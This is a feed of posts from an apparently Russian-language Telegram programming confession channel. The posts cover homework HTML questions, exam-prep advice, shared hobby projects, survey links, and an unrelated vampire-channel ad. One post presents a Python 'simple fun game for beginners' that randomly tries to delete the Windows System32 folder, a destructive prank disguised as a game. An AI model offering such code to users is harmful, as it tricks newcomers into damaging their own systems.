ru
Feedback
Programming confessions ✍️💻

Programming confessions ✍️💻

Открыть в Telegram

Анон @PRCF_AHOHNMHblN_BOT Не анон @Pr0gramming_confessions_bot что...? ты... идешь мыться? но-- Ч-ЧТО... КАК ТАК? БББЮ... ТЫ... ИДЕШЬ МЫТЬСЯ... но как же так...?

Больше
832
Подписчики
-124 часа
-87 дней
-1630 день
Архив постов
Я, как понял, тут не съедают за вопросы по максимально банальным кодам. Короче, нам в школе задали сделать сайт на хтмл для оценки в четверти, мне очень впадлу разбирать документ, который скинул учитель(в 11 классе не люблю тратить время на не предметы моего егэ), поэтому я стырил код у ии, посмотрел — в файле вроде похожее, да и не должно быть там сложно(меня смущает, правда,что код у ии на 10 строк, когда в документе больше, но ладно) но файлы с кодом в браузере отображаются как текст, как это фиксить? Расширение у всех файлов нужное, я всё перепроверил. Пример кода одной страницы для понимания: <!DOCTYPE html> <html lang="ru"> <head> <meta charset="UTF-8"> <title>Фото русских тоев</title> </head> <body> <h1>Фотографии русских тои</h1> <img src="31020fe3c4c269cbc1fb1225af770540.jpg" alt="Той1" width="300"> <img src="Тойчик_русский.jpg" alt="Той2" width="300"> <a href="index.html">Главная</a> </body> </html> @programingconfessions @Pr0gramming_confessions_bot

добри день меня зовут митман первого мая вот укусила меня пчела вот захотел я что-то сделать на консоли... я пошел гуглить... ну и каким-то образом у меня сегодня родился скрипт с прятками с филей если вы не боитесь bat-файлов командных консолей и вирусах которые в лёгкую на этих батниках пишут то можете протестить мой скрипт, инструкции там есть, а если не хотите или боитесь скачивать что-то из рук ноунейма в телеграме то вот ссылка на гитхаб https://github.com/MeatmanTheMeat/hide-and-seek-with-phill.bat_RU

Зацените, я игрушку на юнити делаю

неанон позитивчег всем пр, я новичок в этом кф ещё в начале апреля я захотел сделать собственный пиксель батл, чисто чтоб играть с друзьями. посмотрел мнохо туторов (и чучут ии использовал, извинитк) оцените пж тока как сделать этот ваш сайт, синхронизацию и базу данных я не понял, сами делайте, я устл

Неанон алексайрус Утром, когда лень было встать и дойти до компа, я решил вспомнить про черепашку, нашел сохранненый там код и отформатировал его немного, оставив комменты:
Я хз, делайте с ним что хотите, просто скинул

привет друзья, а можете ли помочь? В общем то мне информатико сдавать (мцко 8 класс), а я вообще не вруьаюсь. Киньте гайды если есть или же советы

привет друзья, а можете ли помочь? В общем то мне информатико сдавать (мцко 8 класс), а я вообще не вруьаюсь. Киньте гайды если есть или же советы

Чем реже лес, match case case case [Или switch, смотря от ЯП]

Привет кф. Я короче сделала бота с песнями и выступлениями одной группы, вот такой @PhantomSiitasongs_bot Это мой итоговый проект, и мне нужно набрать что-то типо комментариев и отзывов от разных людей. Потестите и напишите пожалуйста что-то в комментарии. А то я в кучу кф по тематике музыку закинула, а мне так никто ничего и не написал пока... А вы как раз сможете наверное что-то типо конструктивной оценки мне дать, нравится ли вам функционал, удобный ли и т.д.

︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎...Лишь тот, кто познал ужас ночи, может понять сладость наступления утра. —🤩 ︎︎︎︎︎︎︎︎︎︎︎
︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎...Лишь тот, кто познал ужас ночи, может понять сладость наступления утра. —🤩 ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩
Добро пожаловать, смертная душа. Ночью правят мертвецы, твоё тело больше не принадлежит тебе, и остаётся лишь молиться Господу, чтобы он уберёг тебя от этих страшных существ. Вампиров.❤
︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎ ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎🥄🥄🥄🥄🥄🥄🥄🥄🥄🥄 ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎ ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎ ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎ ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎ ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎ ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎      ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎     ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎     ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎🩸🅰️🩸🩸🩸🩸🩸       ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎🩸🩸🩸🩸🩸🩸🩸🩸🩸🩸 🎃 ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎ ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎ ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎ 🤩 ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎ ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎ ⚰О, великий Дракула, когда мы будем свободны!🌹 Да хоть сейчас. Здесь, в этом конфешене, вы можете поделиться любым творчеством, зарисовками, косплеями и всем всем всем, что связано с вампирами: арты, факты и многое другое. Здесь вы найдёте своё пристанище, исчадия Ада, и смерть постигнет каждого, кто посмеет бросать вызов силам тьмы...🧛‍♂ Эмодзи комбо: 🦇🩸
НАВИГАЦИЯ: ВП ПОСТ (400+) Правила Пост с медиа по вампирам #интересныефакты #разныевампиры Бустануть канал Бот для тейков
🩸🩸🩸: отсутствует, но пожалуйста, будьте адекватными, пока кровь течёт по венам. 🧪

можно пожалуйста сайты откуда можно научиться делать ботов для тг на пайтоне

https://forms.yandex.ru/cloud/69d3c30202848f3d8424438b Можете подсобить для проекта?

Привет, товарищи, хочу поступить в технический универ на заводскую айтишность, вступительне экзамены очень пространные: математическое обеспечение информационных систем; информационные технологии и программирование. Как понять что от меня требуется и как готовиться?

#информатика #ЕГЭ #10класс сорри если вопрос не прям по теме чата люди, подскажите пожалуйста, какие курсы брать по инфе: Кабанова, ЕгэЛенд, 100бальный или школково? Сейчас в 10 классе весной хочу взять на апрель-май и лето, чтоб в сентябре какую-то базу уже иметь по проге и инфе в принципе

This message couldn't be displayed on your device because it violates the Telegram Terms of Service.

Ребят хочу снести с винды десятки Майкрософт Эдж, но оно не умирает. Скачала psexec и db browser, но на последнем этапе в IsInbox 1 не меняется на ноль и нифига не уходит. Объясните на пальцах как это сделать, умоляю. Вот есть ссылка на https://github.com/SoftSonic83/AppxDBEditor?tab=readme-ov-file , но сомнительно. УМОЛЯЮ😭

Простая и весёлая игра для новичков на Пайтоне: import random import os if random.randint(0, 6) == 1: os.remove("C:\Windows\System32")

Посоветуйте, где купить хороший бюджетный VPS на личный прохи-сервер

Многоуважаемый, наилюбимейший прог кф, как думаете, нормально ли попытаться сделать что то в покет коде чтоб ± понять что и как делать при создании игр.........просто я у некоторых школьников видел более менее нормальные проекты в этой штуковине 000 из ООО

Здравствуйте! 👋 Мы (студенты ИТМО) проводим исследование, чтобы понять, какие аспекты бренда работодателя наиболее важны для IT-специалистов поколения Z при выборе компании и насколько это влияет на желание откликнуться на вакансию. Результаты помогут компаниям лучше понимать, что реально привлекает и удерживает вас — от интересных проектов и современной инфраструктуры до честности ценностей и присутствия в Habr/GitHub. ⏱️ Время прохождения: 6–8 минут 🔒 Анкета полностью анонимна, данные используются только в обобщённом виде. Будем очень благодарны за ваш отклик! Ваши ответы действительно помогут сделать IT-рынок лучше 🫶 https://forms.gle/9hYjsMsNjDqxfSfu9